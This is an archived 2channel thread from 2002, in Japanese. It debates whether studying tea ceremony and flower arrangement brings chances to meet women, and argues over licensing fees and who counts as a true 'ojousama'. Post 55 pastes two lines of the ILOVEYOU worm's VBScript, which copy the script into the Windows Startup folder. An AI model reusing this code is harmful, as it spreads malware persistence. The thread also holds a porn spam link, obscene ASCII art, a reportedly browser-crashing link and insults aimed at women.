2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

茶道華道をやれば、出会いがあるかな?

1 :Miss名無しさん:02/10/11 22:23 ID:KDAtlTSi
茶道華道をやれば、出会いがあるかな?
茶道華道をやっている良家子女と出会いたいです。
古典芸能も嫌いな方ではなく、出会いもないので、
やってみたいと思っています。
誰か茶道華道をやっている方いませんか?
出会いがあるのか、男はモテるのか・・・等をお聞きしたいです。

2 :Miss名無しさん:02/10/11 22:28 ID:???
超過激ハメ撮り画像集!!

http://www.need4xxx.net/asian/hamedori/data/099/dir/index.html




3 :Miss名無しさん:02/10/12 01:11 ID:???
それなりの出逢いはあるかもしれないけど…

茶道華道をならってる良家子女は
そのような理由で習いにきてる人は相手にはしないんでは??

4 :神のお告げ。:02/10/12 01:14 ID:???
器職人になりなされ。

5 :無頼罵 ◆Oq/9NMk1yg :02/10/12 01:15 ID:???
茶道華道なんざやっとるフヌケな男なんざゲロ、や。
そんな男に惹かれる女なんざキモキモ、正直イテヨシ、ってなトコや。
>1よ。
ま、オマエは柔道でも習いに行くがええ。
で、ヤワラちゃんみたいなヴッサイ女ぁゲト、これ最強、や。
ちゃんとしぃや。
以上。。。。。。。。。。。。。。。。。。。。。

6 :Miss名無しさん:02/10/12 01:17 ID:???
>>5
ワラタ

7 :ドブネズミ ◆9pDObUBxJY :02/10/12 01:17 ID:???
俺、華道習ってたけど…
別にお嬢様なんていなかったような気がする。
単に周り見てなかっただけか?

8 :Miss名無しさん:02/10/12 01:17 ID:???
体体体●                       ●●●●●
体体体●                      ●頭頭頭頭●●
体体体●                    ●●頭頭頭頭頭頭●●●
体体体●              ●●●●茎●頭頭頭頭頭頭頭頭頭●●
体体体●       ●●●●●茎茎茎茎茎茎●頭頭頭頭頭頭頭頭頭●
体体体● ●●●●茎茎茎茎茎茎茎茎茎茎茎茎●頭頭頭頭頭頭頭頭●
体体体●●茎茎茎茎茎茎茎茎茎茎茎茎茎茎茎茎茎●頭頭頭頭頭頭● 
体体体茎茎茎茎茎茎茎茎茎茎茎茎茎茎茎茎茎茎●●●●●●●●    
体体体体茎茎茎茎茎茎茎茎茎茎茎茎茎●●●●               
体体体体茎茎茎茎茎茎茎茎茎●●●●                     
体体体体茎茎茎茎茎●●●●                          
体体体体茎茎●●●         

9 :無頼罵 ◆Oq/9NMk1yg :02/10/12 01:19 ID:???
>7=フヌケのゲロ(w
チャントセナイカン。。
以上。。。。。。。。。。。。。。。。。

10 :Miss名無しさん:02/10/12 01:22 ID:???
適齢期になって茶道華道始めたようなのは
お嬢様ではありません
お嬢様は10代のうちに習得します
茶道華道習ってまーすなんていう20台の女は糞

11 :Miss名無しさん:02/10/12 01:26 ID:???
20半ばで茶華道習い始めるのは「必死だな」って思う。

つーか今はフラワーアレンジメントっしょ。

12 :無頼罵 ◆Oq/9NMk1yg :02/10/12 01:29 ID:???
>10よ。
習い事、始める時期は遅い早い関係アラヘンデ。
やりたい事を、やりたい時に、パクパク。
これが正しい習い事、や。
ガキの頃に習得シマス!ってのは、親に習得させられとるだけや。
結果が全て、やない。  習おう、っちゅう意思を持つ、
って事は、非常にスンバラスィ。
ま、人の事ぉクソやら言うとるオマエ、下品極まりないワナ。
ちゃんとしぃや。
レデェはオシトヤカニするモンですワ。 ウフ♪
以上。。。。。。。。。。。。。。。。。。。。。。。

13 :ドブネズミ ◆9pDObUBxJY :02/10/12 01:30 ID:???
つーかフヌケでも抜け毛でもねーよ。
親が習わせたんだよ、親が。
他にもピアノも習わされたぞ(w
今じゃネコふんじゃったくらいしか弾けんが

14 :無頼罵 ◆Oq/9NMk1yg :02/10/12 01:32 ID:???
>13よ。
それを言うとるんや。
自分から学ぼうとしとるモンと、学ばされとるモン。
基本的な取り組み方がチョト違う。
ま、茶道華道なんざどうでもええんやけどな。
ネコフンジャッタはワシもマッハ、や。
以上。。。。。。。。。。。。。。。。。。。。。。。

15 :Miss名無しさん:02/10/12 01:32 ID:???
あなたの言うことはわかるけど、
お華やお茶って、他の習い事のように
その場限りの特技ではなくて
生活の中で活用すべき嗜みだからなー
それまで畳の縁踏んでずかずか歩いていたような娘(
そういう躾をしない家庭で育った娘)が
いきなり、お茶だのなんだの、付け焼刃でしかないよ。

16 :Miss名無しさん:02/10/12 01:33 ID:???
15は無頼漢あてよ。

17 :Miss名無しさん:02/10/12 01:34 ID:+QmvzDNn
私は、15歳から華道
18歳から茶道やってますが
若い男の人で習ってるの見た事ないですねー。
見るのはおじちゃま・おじいちゃま。
若い人ならもしかしておばちゃまから可愛がられるかもよ。(笑)


18 :Miss名無しさん :02/10/12 01:37 ID:???
>>10って本当のお嬢様を知らないんじゃないかなあ?
20代でもお華だのお茶だの習ってるお嬢様は結構いるよ。
逆に10代で師範の免除だの看板だのを貰う人のほうが微妙。
だって、ホンモノのお嬢様ってそんな資格もって無くても平気だもん。
お嬢様に憧れてる人や、親が子供に習得させたいって人がお金を払って師範免除を貰ったりする。
逆にホンモノのお嬢様はおっとりと20代になっても30代になっても楽しんで習ってる。
私はお嬢様じゃないけど、学生の頃からずっと習っているから、何となくそういうのを見てきた。

19 :無頼罵 ◆Oq/9NMk1yg :02/10/12 01:40 ID:???
>15よ。
だから習いに行くんやんけドアホ。
付け焼刃でも、刃ぁ無いよか全然マシや。
何事も続けること、カナーリ肝心、や。
一日二日ぁ通うだけ、っちゅうのは、
習うとは言わヘンデ。
ま、ちょっとは「ちゃんとセナイカン」、と自分で思うとる奴を、
「ゼーンゼンダメダヨ」って言うのは、
畳の縁踏んでずかずか歩くよか下品やとワシは思うデ。
以上。。。。。。。。。。。。。。。。。。。。。。。。。


20 :Miss名無しさん:02/10/12 01:41 ID:???
10>18
は?
20代になって習い始めるような方は、という話ですが。
師範だの看板だのの話はしてませんが?
どこからそう読めるのかしら?
四角を気にしているのは貴女でしょ。
楽しんでるのは結構ですわよ。
でも、楽しむにはある程度マスターしていなければ
楽しめないでしょう?なんでも。


21 :Miss名無しさん:02/10/12 01:42 ID:+QmvzDNn
そうかな??
私10番さんではないんだけど、
やっぱり本当のお嬢様って(10代とは限定しないけど)
学生の頃からお茶・お花等の習い事してると思うよ。
24,5歳位で嫁ぐって考えてるだろうし、それまでに
師範とか結婚道具そろえてるような気がするなー。

22 :Miss名無しさん:02/10/12 01:42 ID:pXebIRvY
変換ミスくらい確認して書き込もうぜ。
落ち着け(w

23 :Miss名無しさん:02/10/12 01:43 ID:???
>19
まあ、糞扱いはごめんなさいデスわ。
あとは、同意できませんけど。

24 :Miss名無しさん:02/10/12 01:43 ID:???
でも、育ちは10くらいまでで決まるし、
知性や人格も20までで決まる。
普通に考えれば20過ぎてから何かをするのは・・・(中略)

25 :Miss名無しさん:02/10/12 01:44 ID:Sfd8Jpf2
18はコンプレックス刺激されたんでしょ

26 :無頼罵 ◆Oq/9NMk1yg :02/10/12 01:45 ID:???
心配せんでもココ居る奴、
知性も人格もメロメロやんけ。
ま、目くそ鼻くそ、ってなトコや。
チャントセナイカン。 
ワシも、や。
以上。。。。。。。。。。。。。。。

27 :Miss名無しさん:02/10/12 01:45 ID:???
>無頼漢さん
どこでもいいから、OL相手の茶道/華道教室
のぞいてご覧遊ばせ。
それでも、意見が変らないなら、結構ですわ。

28 :Miss名無しさん:02/10/12 01:47 ID:???
10>18
ついでに言えば、看板もお免状も、つり書き狙いでガツガツしなくても
気がついたら持っていたというものよ。
あなたのいう「お嬢様」なら。


29 :Miss名無しさん :02/10/12 01:50 ID:???
>>20
ああ、私コレ↓に反応したの。
>お嬢様は10代のうちに習得します

習得しちゃうとそのあと楽しめないでしょう?
マッタリとお茶を楽しんでる人って、結構多いよ。
資格もなにも取らずにね。
私は親の見栄でお嬢様学校に通わされたけど、10代で資格をとる人って親が子供を玉の輿に乗せたいって人が多いんだよね。
本人もドンドンその気になってるんだよね。
逆にお嬢様って10代の頃はバイオリンだのお琴だの習ってて、大学になってからとか社会人になってからお茶やお華をはじめる人が結構多い。
それから10代はほとんど外国でくらしていたから、20代になってからはじめたって人もいる。

学生時代の経験から言うと、10代に資格とっちゃう人ってやっぱり「お嬢様願望が強い人」であって「お嬢様」ではないと思う。
お茶やお華の免許を持ってるのがお嬢様!って偏見が、いかにも一般市民っぽいよね。

30 :Miss名無しさん:02/10/12 01:55 ID:???
え?
楽しめますわよ>習得しちゃうとそのあと楽しめないでしょう
お茶のたて方だけをマスターするのが茶道じゃないもん。

お免状という見栄えは関係ないの。お分かりいただけないでしょうけど。
大体、お免状なんて上に行けば行くほど、先生との関係とか色々あるし。
茶筅のまわしかたマスターしてお免除もらうのが茶道だと思ってるみたいねえ・・・
私、貴女みたいな精神貧乏って大キラーイ



31 :Miss名無しさん:02/10/12 01:56 ID:+QmvzDNn
習得しちゃうと楽しめないでしょうか??
お花なんて私は15歳からはじめてのーんびりと21歳で師範とりましたけど
22歳になってやっとお花の楽しさが分かってきたかなー!って感じですよ。
私、28番さんと同意見で
本当のお嬢様ならまったりと楽しみながらも自然と資格やら
お免状も手に入れてる様な気がする。


32 :Miss名無しさん:02/10/12 01:56 ID:Sfd8Jpf2
つーか、免状にこだわってるのって29だけじゃん・・・
よっぽど劣等感あるんだね

33 :Miss名無しさん:02/10/12 01:58 ID:???
>31
そうよねー
今日はどんな御菓子?とか、お茶道具見るのとか楽しいよね
お華だって、輸入花に挑戦したり。

34 :Miss名無しさん:02/10/12 01:59 ID:???
>>30
えぇっとね、貴方のいう「習得」てもしかして、ものすごく下のレベルでの「習得」なのかなあ?
私がさっきも言ったとおり、看板もらったりすることなのね。
それに多分貴方が習ってるのは、本当に「資格を取るため」のトコじゃないかなあ?
私が通ってるトコは、資格とる人ほとんどいないんだよね。
毎週あつまってみんなでゆっくりお茶の時間を楽しむ。
それだけ…って感じ。
ガツガツと上を狙って行くのもいいけど、何かミットモナイね…そういうの。
お茶にせよお華にせよ、もっと「楽しむ」ものじゃないのかなあ・・・?
貴方のレスを見て10代で師範免除を取って、医者と結婚するために頑張ってる友達を思い出した・・・


35 :Miss名無しさん:02/10/12 02:03 ID:???
>>32
そか?>>28もスゲー資格にこだわってるように見えるが・・・

36 :Miss名無しさん:02/10/12 02:05 ID:+QmvzDNn
>33
 お茶道具は本当に見ててすっごく楽しい!
 私はおなつめが特に好きなのです。(笑)
 お華も盛り花でやっと冒険した生け方が出来る様になったかな。
 私の習ってる所も先生のお家にお邪魔してゆったりとお稽古して
 その後お喋りしてって感じです。
 少し前に習ってる人で玉の輿狙いって感じの人も居たけどさ・・

37 :Miss名無しさん:02/10/12 02:06 ID:???
は?
ごめん、あなたが言ってることわからないわ・・・
下のレベルって、どこからどこまでが下なのかな?
悪いけど、わからないわ。

下世話な話で申し訳ないけど、流派ってお免状取るときの
色々で経済的には成り立ってる部分があるんだけど
>毎週あつまってみんなでゆっくりお茶の時間を楽しむ。
ていうのは、公民館か何かの茶話会?

38 :Miss名無しさん:02/10/12 02:07 ID:???
茶道も華道も単なる一般教養であり、
相手をもてなすための最低限の礼儀です。
このスレは何か、おかしい・・・
議論すべき点がずれている気がする。

39 :Miss名無しさん:02/10/12 02:08 ID:???
37は30で34あてね。

>36
そうよねー
棗は萌えーよね。
私のお棗入れはお手製よーハギレ集めて作ったの。



40 :Miss名無しさん:02/10/12 02:10 ID:+QmvzDNn
>>毎週あつまってみんなでゆっくりお茶の時間を楽しむ。
>ていうのは、公民館か何かの茶話会?
私が思うに、
先生のお家でお稽古って事じゃないかな??
37番さんのお稽古はどんな感じなの??


41 :Miss名無しさん:02/10/12 02:12 ID:???
>>37
あぁ、ごめんなさい。
お金大好きな先生に師事しちゃったんだね。
私が習ってる師匠はお金に無頓着だから資格とることを勧めないんです。
お礼金目当てで資格取って欲しがる人についちゃったんなら、ご愁傷様です。
「ゆっくりお茶の時間を楽しむ」こともできないようなお茶会って…どんなお茶会?
ピリピリしてんの?
詳細キボン。

42 :Miss名無しさん:02/10/12 02:15 ID:???
>>34
チョト判る気がする。
私も3歳から日舞ならってるけど、資格なーんにももってまへん(w
お華もお茶も似たようなもん。
でも中学か高校くらいから習いにきた子はドンドン取るんだよね。
何でそんなに必死なのーー??ってくらい。
もっと楽しめばいいのに〜。
私はもっと楽しんで最終的に老後の楽しみにしたい。

あ、あとついた先生にもよるよね。
金儲け主義の先生だと資格とることをすすめるラスィ。
お礼金目当てで。
ウチの師匠はそういうのはぜーんぜん興味ナッシングなので何年通っても資格一つ
とってないっす(w
それが良いのか悪いのかはわかんないけど、何で資格にそんなにこだわる人
がいるのか不思議。
10代で取るのがお嬢様の証って考え方、今どきないよね…


43 :Miss名無しさん:02/10/12 02:16 ID:???
>>41
そうなんだ、私が聞いた限りでは一般に権威があるというところほど
お金には・・・って感じだったけど。
私には無縁だけど、家元についての解説を聞いたら、
閉鎖社会のねずみ講だな、と感じました。

44 :Miss名無しさん:02/10/12 02:17 ID:???
ああああああスンゴイ亀レスになっちゃったよ〜〜(´・ω・`) 
42は無視してください。
空気読めない私、逝ってヨシ!!

45 :Miss名無しさん:02/10/12 02:18 ID:???
37>40
皮肉よ(藁
普通に、先生のお宅でお稽古です。
で、先生がお金大スキかどうかは知りません。>41
家元制度のことを考えたら、そういう嫌な面も
見えちゃうってことなんだけどな。
何をいきり立っているのか知らないけど、
お茶の時間は楽しいですよ?
あなたのいう資格ってお免状のことでしょ?
お免状って「ここまで出来ました」じゃなくて
「こんどは○○ができるようになりましょう」っていう
目安や目標みたいなものだと思うんだけど。


46 :43:02/10/12 02:20 ID:???
でも、家元制度の嫌な面を知っているなら、
お免状の意味するところも知っていそうだけどなぁ・・・


47 :Miss名無しさん:02/10/12 02:21 ID:???
>>43
それは思った。
それから、お華にせよお茶にせよ日舞にせよ、結局「お金」で動くんだなあとも思った。
聞いた話では、ひどい先生の場合は資格とるのに掛かったお金と同額のお礼を要求するんだってさ。
で、逆にそういうとこの方が資格の取得率がイイんだって。
まあ、元々資格なんて年数とお金で買うようなもんだからしょうがないといえばしょうがないんだろうけど…。
流派にもよりけりらしいけどね。

48 :Miss名無しさん:02/10/12 02:23 ID:???
>>45
>お免状って「ここまで出来ました」じゃなくて
>「こんどは○○ができるようになりましょう」っていう
>目安や目標みたいなものだと思うんだけど。

じゃ、何でその「区切り」ごとにお金がいるんだろうね。
家元制度知ってるなら、当然知ってるよね。

49 :Miss名無しさん:02/10/12 02:25 ID:???
んー
お免状とったころはそういうこと考えなかったね>48
親のおかげで考えなくて済んだだけね。

50 :Miss名無しさん:02/10/12 02:25 ID:???
>45
横レススマソン。
お茶の時間が楽しいなら、それでいいんじゃないでしょーか。
何で20代でその「楽しいこと」をはじめちゃイカンのかが理解できないので、解説してホスィ。

51 :Miss名無しさん:02/10/12 02:26 ID:???
>48
そういうお話したければ趣味板のほうがいいんじゃない?

52 :Miss名無しさん:02/10/12 02:27 ID:???
>>49=>51
何でそんなに>>48を排除したがるの?

53 :Miss名無しさん:02/10/12 02:27 ID:???
いけないなんていってないよー
「お茶習ってるんですぅ」なんておおっぴらに言う
OLさんの印象がよかったためしがないもので。>50
絡みに乗っちゃっただけ。下品でごめんね。

54 :Miss名無しさん:02/10/12 02:28 ID:???
貧乏臭いから>52

55 :test ◆.CzKQna1OU :02/10/12 02:28 ID:???
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

56 :Miss名無しさん:02/10/12 02:28 ID:???
それよりも、男が女と知り合うために立てたスレを
毒女(orネカマ)が占領しきったところに
毒女板の底力を感じますた。。。

57 :Miss名無しさん:02/10/12 02:29 ID:???
ぜひ聞きたいわ>1の感想

58 :Miss名無しさん:02/10/12 02:29 ID:+QmvzDNn
先生も大変なんだよ。
お茶もお花の世界も。
先生は親先生にお礼しないと駄目だしね。
だからお金大好きな先生ってのもあると思うんだけど
その組織の中で少しでもいい立場に居たいなら弟子をたくさん
持たないと駄目なんだと思うよ・・・

59 :Miss名無しさん:02/10/12 02:30 ID:???
>>53=>>54=>>10だよね?

10 :Miss名無しさん :02/10/12 01:22 ID:???
適齢期になって茶道華道始めたようなのは
お嬢様ではありません
お嬢様は10代のうちに習得します
茶道華道習ってまーすなんていう20台の女は糞


糞って…こんな言葉使う人間が一番糞だと思いません?

60 :Miss名無しさん:02/10/12 02:31 ID:???
あーらごめんね
48の反逆?

61 :Miss名無しさん:02/10/12 02:32 ID:???
てか、いいじゃん2ちゃんだし

62 :Miss名無しさん:02/10/12 02:34 ID:???
>>60=糞だと判明しただけじゃん・・・

てか、女で他の女を糞扱いする女がいくら茶道だの華道だの習っても意味ねーだろーが。

63 :Miss名無しさん:02/10/12 02:35 ID:???
>>60
違う。
ロムってて思っただけ。

素朴な疑問として思っただけ。
糞なんて言葉を平気で使う人間ってどういう人間なんだろ?って。
私は日常レベルでも使わないし、ネットでも使ったことない。
そんだけ。んじゃ。

64 :Miss名無しさん:02/10/12 02:38 ID:???
ばいばーい>63

65 :Miss名無しさん:02/10/12 02:40 ID:???

今までいた中にホンモノのお嬢様がいないことは確定したわけだな・・・
何かちょっと男としてはイヤーなものを見せられた気分だ・・・マジ・・

66 :Miss名無しさん:02/10/12 02:42 ID:+QmvzDNn
君の言うホンモノのお嬢様って一体何もの??

67 :Miss名無しさん:02/10/12 02:43 ID:???
そもそもホンモノのお嬢様は
こんな時間に2ちゃんやってないでしょ

68 :Miss名無しさん:02/10/12 02:44 ID:???
金持ちで家柄が良くて上品でおっとりした女=お嬢様

69 :(´・ω・`) ◆bAxfnuBTAY :02/10/12 02:45 ID:???
>>67が真理。
つうか、こんな時間じゃなくても普通はいないと思われ。

70 :マサカズ ◆1cMsD4KPCE :02/10/12 02:58 ID:???
漏れはともかく、うちの祖母が池房の師範だったが
男が習いに来るケースは珍しいかったと思う。
もしかしてたら、教えなかっただけかも知れないが。

71 :Miss名無しさん:02/10/13 23:55 ID:???
( ゚д゚)ポカーン

72 :Miss名無しさん:02/10/14 00:00 ID:???
てs

73 :Miss名無しさん:02/10/14 17:32 ID:???
>68
正直、上品だけで良くない?

74 :Miss名無しさん:02/10/16 11:41 ID:???
>>73
そうとも限らない

75 :Miss名無しさん:02/10/16 11:55 ID:j1vCL/sq
小中学一緒だった子で華道習っている子がいた。
その子は小学生の時から習っていたみたい。
それを極めきったかどうかは不明だが19歳で結婚した。
その子は金持ちでなかった。家族でアパート住まいだったみたい。
華道したから早婚というわけではないかもしれないが。

76 :Miss名無しさん:02/10/19 19:55 ID:???
>>75
単なるDQNでは?

77 :Miss名無しさん:02/10/25 06:09 ID:XXBwI+nF
俺も華道茶道をならってみたいな

78 :Miss名無しさん:02/10/25 23:45 ID:???
今時、良家の子女も何もあったもんじゃないでしょ。>>1
身分階級というか、そういうのが今の時代、ある?てか、見たことある?
「あそこのおたくのお嬢様が〜」「元華族は違うわねぇ〜」
日常会話にそんな話も出てきたことある?ないでしょ?
あなたの身近に普通にいないなら、どこに行ってもいないよ、もし仮にこの世の
どこかにいたとしても「住む世界が違う」んだから。高望みもいい加減にしたら?
女性に対して変に夢なんか見ていないで、普通の娘さんとそれなりの場所で
知り合って、早々に結婚なさい。女はどれも同じなんだから。
だから「おんなし(女衆)」って言うんだってサ!!

でも、お茶を点てている男性の手つきはとてもきれいだよ。
女性の目から見ると、ちょっとどきどきすることはあるよ。それだけだけどね。
まぁ習う価値はあるしやりたいなら止めないけど、邪念で始めるとろくな事がないぞ(w
茶道、華道は、とくにな。女が多い「女社会」だから。

79 :トオル@話にならない馬鹿:02/11/05 14:47 ID:???
俺のホームページです(素)
http://www61.tok2.com/home/tripsage/

80 :Miss名無しさん:02/11/07 23:01 ID:???
( ゚д゚)ポカーン

81 :愛  ◆T2HIROPINk :02/11/07 23:02 ID:jYtJat8Y
出会いはありません

82 :Miss名無しさん:02/11/07 23:06 ID:???
>79はブラクラ注意         

22 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)